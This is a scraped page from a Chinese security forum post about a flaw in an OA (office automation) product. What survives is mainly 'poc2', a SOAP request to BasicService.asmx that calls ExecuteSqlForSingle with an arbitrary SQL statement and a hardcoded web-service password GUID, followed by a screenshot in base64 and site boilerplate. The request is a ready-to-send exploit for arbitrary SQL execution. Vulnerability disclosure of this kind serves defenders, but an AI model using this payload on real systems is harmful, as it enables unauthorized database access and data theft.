/rdZqhSNgP1J0bT9LA8UnqRaZpyueqeoXrl1tv1a5Ips2YeBphHUlNt2Ru3u/M5ktZW2ieJc61RrwLrHmRmS+WPJQAAAEBRV6TzZvJH8kcAAAAA+cq/pZVNU6k2w8MrLSG1eTu/+WW1bV7v6uu1TUq1JWnpY/U0dXP6Nb/9W8OaOx1vflltH/u3DnnsPxf3+dkwUtWr3nT19eL6tPNJH+qhriMV0/UmVa86Uhs9Xaskze56k2Jmf6iHnMuSMhxn2ecDmp3ke7i5t+zSesU4YkgfX5bxeYj9xa98a9
<p blockindex=50>poc2:</p>
<pre blockindex=51><code class="hljs language-js">POST /WebService/BasicService.asmx HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
Content-Type: text/xml; charset=utf-<span class=hljs-number>8</span>
Content-Length: length
<span class=hljs-attr>SOAPAction</span>: <span class=hljs-string>"http://tempuri.org/ExecuteSqlForSingle"</span>

&lt;?xml version=<span class=hljs-string>"1.0"</span> encoding=<span class=hljs-string>"utf-8"</span>?&gt;
<span class=xml><span class=hljs-tag>&lt;<span class=hljs-name>soap:Envelope</span> <span class=hljs-attr>xmlns:xsi</span>=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> <span class=hljs-attr>xmlns:xsd</span>=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> <span class=hljs-attr>xmlns:soap</span>=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span>&gt;</span>
  <span class=hljs-tag>&lt;<span class=hljs-name>soap:Body</span>&gt;</span>
    <span class=hljs-tag>&lt;<span class=hljs-name>ExecuteSqlForSingle</span> <span class=hljs-attr>xmlns</span>=<span class=hljs-string>"http://tempuri.org/"</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>sql</span>&gt;</span>select @@version<span class=hljs-tag>&lt;/<span class=hljs-name>sql</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>strParameters</span>&gt;</span><span class=hljs-tag>&lt;/<span class=hljs-name>strParameters</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>webservicePassword</span>&gt;</span>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}<span class=hljs-tag>&lt;/<span class=hljs-name>webservicePassword</span>&gt;</span>
    <span class=hljs-tag>&lt;/<span class=hljs-name>ExecuteSqlForSingle</span>&gt;</span>
  <span class=hljs-tag>&lt;/<span class=hljs-name>soap:Body</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>soap:Envelope</span>&gt;</span></span>
</code></pre>
<p blockindex=52><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB4AAAAHsCAYAAAAzRLDdAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdd3wU1f7/8fduQkIiRcAI0kMITUQUEFCRqoQiItIRUBGwUPRSJCogoBRpNrwXQUSagAV+oFG5YOCqWBCVUCSURJBeha+CkOzO749kh92QbEvbhNfz8ZgHmTlnznzO2cCDz56ZM5aUlBRDAAAAAAAUcufP/63jp86a+2UjSqtE8fB8jAgAAAAAgJxnze8AAAAAAAAAAAAAAAA5gwlgAAAAAAAAAAAAACgkmAAGAAAAAAAAAAAAgEKCCWAAAAAAAAAAAAAAKCSYAAYAAAAAAAAAAACAQoIJYAAAAAAAAAAAAAAoJIJ9q/6Ngp4eKUumZTVl3D9JtpjKORAWAAAAAAAFEXkzAAAAACB/5eATwImyrO2uoC8O5lyTee3YQVkW9ldQQn4HAgAAAAAofApB3gwAAAAACHg+PgHsUFP2se/LXu7KEcsX/RW0NlGWnzfJEtNXRs7El4cOyrqgu6yHJeP2/I4FAAAAAFCwFca8GQAAAABQEPg5AXw1o34bGWsTZTmc7HT0oCxfLJR1bVz68lc1ZQyeJFu9yi51rAvHyrolMa38/jbS2jmyqL1sc8bJMJfPcuxLyvSY52tZEibKOjfuylJcFdrL9tg4GeUOyjo5bfJXkixzmyi4wtOyPU9CDgAAAADIGf7mzVnnspJzfmwfLFkc9VzqpLfzxUTX69w/UPaYu6/Os8dGyrpgjiyH09qxPzbOnMh2H4t3/QEAAAAA5K4cWwLa8uv69CQz8sqxhd0VtNYpMVSiLHOdl7tKn3jdknilfO2cLN6V5OH6nq51bLFrkipJh+MUNGmiH1cDAAAAAMA3fuXNbnJZ19w5zrXe4TgFLVhs7lsWNrn6OmtHKmjhNxmijFPQpPTJ3/R2rI52vIjF8/cAAAAAAIDc5ucTwImyTmqS6eyx0TH9qdlji2XdIte7gY99o6BJI2VZu1CWmHEyjm1KTypryj54kuz1KsvyxUQFrY3zLRxvrnUiOT3RzvzJXvvzK6X0p4CNwd/LVs+3EAAAAAAAuCKH8mYPuaxLu/evlC2msnRscfok7hxZE/rKdmP6dZxyb7POlpEKut01BzbbSZio4LlxkuOJZU+xeNMf3wcSAAAAAOCjnFsCutHTssf0vbLskyMxPBynoEkZJ3T3y3JMTolsGxnpy0EZMa1krI3z7Slgb65Vr5WMCnGyHJ6joKfnSBVqyrh9oOz173ZZEgsAAAAAgNzgV97sdS7bXvaY9GWWy/WVvdEcBW2RdOSgpPTrNBqYNvmbWR1zArimjPrpdeq1kiGn/NxTLN70h/wbAAAAAHKdn0tA15R97PdKnbNStvtrSpIsW9b7MGmbKMsJp93ykbl4F7DjWnfL9vz3sg1+WvZGNWU4lrua1F/WY7l2cQAAAADANSmn8ua8zmWj3EzSZieWDN8DAAAAAAByTTafAK4sI+Z92dRfQWsTZZ00Ucac9CWdbkyb1LWovWxjx2WeQB5Lr7Nlnqwxd8teTrJ8MS+LhDhO1oRHZKtX+eo63lwrnVGvr4x6fWW+f/hwehJarrKM8pIOZ30uAAAAAAC+yWbenC7rXNZRI07WL1rJHnO3jGPfpC/5LKl85SvX2TJP1tsrm0tAO5aFTnvi1/t39GYZiw/9AQAAAADknhxZAtqImST7z91lPRynoMmRae8CMpeTymTpJ8f7gsw6Wb8bSaoso4JkOSxZ5nbPPGBvruV4d9FVasq40fWIZW4TBXvxfiUAAAAAALzhd97sSy67dqSC1rq2Ya8nSU6599zurrl3o4GyeztR6ykWb/rj5aUAAAAAAP7zcwnojCrL/tjTaYnc4TmyfpF257DxyErZGtV0SfCMRq5Jn/HIStkb1Uzfqylj8NMZEsL0tivITR0vrlVvnGyD2zu1I6lCe9nHvm8mu8btV7cLAAAAAED2+Zk3e5HLpmmfVs+pTsbc23a/U7lqyrh/hmyP3O19F7zJq734HgAAAAAAkLssKSkpAZaDfaOgp0emLRnlWBYLAAAAAIBsOn/+bx0/ddbcLxtRWiWKh+djRDmBHBoAAAAA4CqHngAGAAAAAAAAAAAAAOQ3JoABAAAAAAAAAAAAoJAIwCWgAQAAAADIeYVzCWgAAAAAAFzxBDAAAAAAAAAAAAAAFBJMAAMAAAAAAAAAAABAIcEEMAAAAAAAAAAAAAAUEkwAAwAAAAAAAAAAAEAhwQQwAAAAAAAAAAAAABQSTAADAAAAAAAAAAAAQCHBBDAAAAAAAAAAAAAAFBJMAAMAAAAAAAAAAABAIcEEMAAAAAAAAAAAAAAUEkwAAwAAAAAAAAAAAEAhEezPSQtXrtGX8Zv1295kXbh4Madj8klQUJBuqVVdbVveqUe6d1JQUJAkKX7T1/r11+06dPiILl26lK8x5gar1arKlSvqtlvrqWWLZrJa0+byC3u/nQX6GAR6fA5ZxQkAAADAf+TNgSXQ87NAj8+B/BEAAAAoGCwpKSmGLyeMnDBTv2z/TY/2elBNGt6mcjeWUWhISG7F51aqzabjJ07ry/hvNH/Jx2rS4BbNnjRaixcvV1Jysu5t00q1atVUqetLqkiRIvkSY26w2+06e/ZPbf3lV325br1qRkfr8QH99P6iDwp1v50F+hgEenye4iSJBwAAQGF0/vzfOn7qrLlfNqK0ShQPz/HrkDcHlkDPzwI9Pk9xkj8CAAAAgcenCeD3PlitRSvX6D+zJqh8ubK5GZfPfj94WL0HjVC7Fo1lvXxRw4c/pTJlyuR3WLnu+LHjmjx1pmrXrqEjh49eM/12FuhjEOjxOTjifKBTe8W0bZ3f4QAAAAA5Li8mgMmbA1ug52eBHp8D+SMAAAAQ2HxaAvrz9f9Tn26dVLpUGf1zKTW3YvJLubJlNbBfDy3+4EO9/NzTKlGihFJSUvI7rFxXukxptWt3r9asjVO3rg9eM/12FuhjEOjxOTji3PzdDyTwAAAAgJ/ImwNboOdngR6fA/kjAAAAENh8mgDetuM3/WvoYP1zOfCSD0lq0uh2zXprniKrVtXly4GVaOemOrVra9mylddcv50F+hgEenwOdWrX1vLlH+d3GAAAAECBRd4c+AI9Pwv0+BzIHwEAAIDA5dME8MULF1Wy9PW6GKCJbPHrS8iemqqSJUsq1WbL73DyTPHixXX5cso1129ngT4GgR6fQ/HixfXPP//kdxgAAABAgUXeHPgCPT8L9PgcyB8BAACAwOXTBLDdbldKqqEUBe4dqHa7XRarVYbh9auNCzyL1aqUlNRrrt/OAn0MAj0+B0ecAAAAAPxD3hz4Aj0/C/T4HMgfAQAAgMDl0wSwYbcH9N2nUlqMgZwg5ZbU1NRrst/OAn0MAj0+h1QbCTwAAADgL/LmgiHQ87NAj8+B/BEAAAAITFZfKqclskbWW/K7erxOVTW+aovVN+7Oy8HNkchmuSX9Rw+Uv1EVr9o6aF6Sm/MCfLPZbF70e4TivT2erW2DnsuH8QysMfA9vuR3Oqhip/8o2elY/OgbVXH0Bqff28zi3KDnnMuy2R9bamB/WQUAAAAEssKTN5M/kj+SPwIAAAAFlR8TwDY3m12GeurVX/dpk9P26kMfaMTD8/W723NzZjPsdi960leLDx/XH87bklqacHdHzU/2cyTzmS3A7zDPC4E+Bp7iqzrwTY3XOP0nPv1A8ly9tnuivp7WKv1AIzVouFhfxGc4MT5OSxs2UoM8ihMAAABA1gpP3ly4BXreQ/4IAAAAIDt8XgLaZnOTKNoNGTJkt9nlnAI07Pu8bu68T3/Y7LrJz0B9idEw3CyTlF5kGIZcarV4SuMaNtXeZENG1VwMMJekptr863dWx7Mlra20O4JzrFGPAmsMruYxPlXVgOF9Vfm1uRrcYpB+//c41Rx+TFXMcaylDh2lz/YlyWgRaZ618fPF6t1xohJ/2usy5v72x5bKl0EAAACAvwp13kz+SP6YAfkjAAAAEJh8ewLYMJ
 </div>
 <div class="post-opt mt-30">
 <ul class="list-inline text-muted">
 <li>
 <i class="fa fa-clock-o"></i>
 发表于 2024-08-26 09:30:02
 </li>
 <li>阅读 ( 136 )</li>
 <li>分类：<a href=https://forum.butian.net/articles/OA target=_blank rel="noopenner noreferrer">OA产品</a>
 </li>
 <li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=536 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
 </ul>
 </div>
 </div>
 <div class="text-center mt-30 mb-20">
 <button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=536 data-support_num=0> 0 推荐</button>
 <button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=536> 收藏</button>
 </div>
 </div>
 
 <div class="widget-answers mt-15">
 <h2 class="h4 post-title">0 条评论</h2>
 <div class=comment>
 </div>
 
 <div class="widget-comment-form row mb-20">
 <form class=col-md-12>
 <div class=form-group>
 <textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
 </div>
 </form>
 <div class="col-md-12 text-right">
 
 <button type=submit data-token=qwOXfPKpQrjtTfVcW6bH2y6e7O1XcL7wgXw67yiG data-source_id=536 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
 </div>
 </div>
 
 <div class=text-center>
 
 </div>
 </div>
 </div>
 
 
 </div>
 </div>
</div>
<footer id=footer>
 <div class=container>
 <div class=text-center>
 <a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
 <a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
 <a href=https://forum.butian.net/sitemap>sitemap</a>
 </div>
 <div class="copyright mt-10">
 Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
 </div>
 </div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
 
</div>
 <div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
 
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-536 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
 
</div> 
 
 <div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
 
 </div>
 
 
 
 
 
 
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c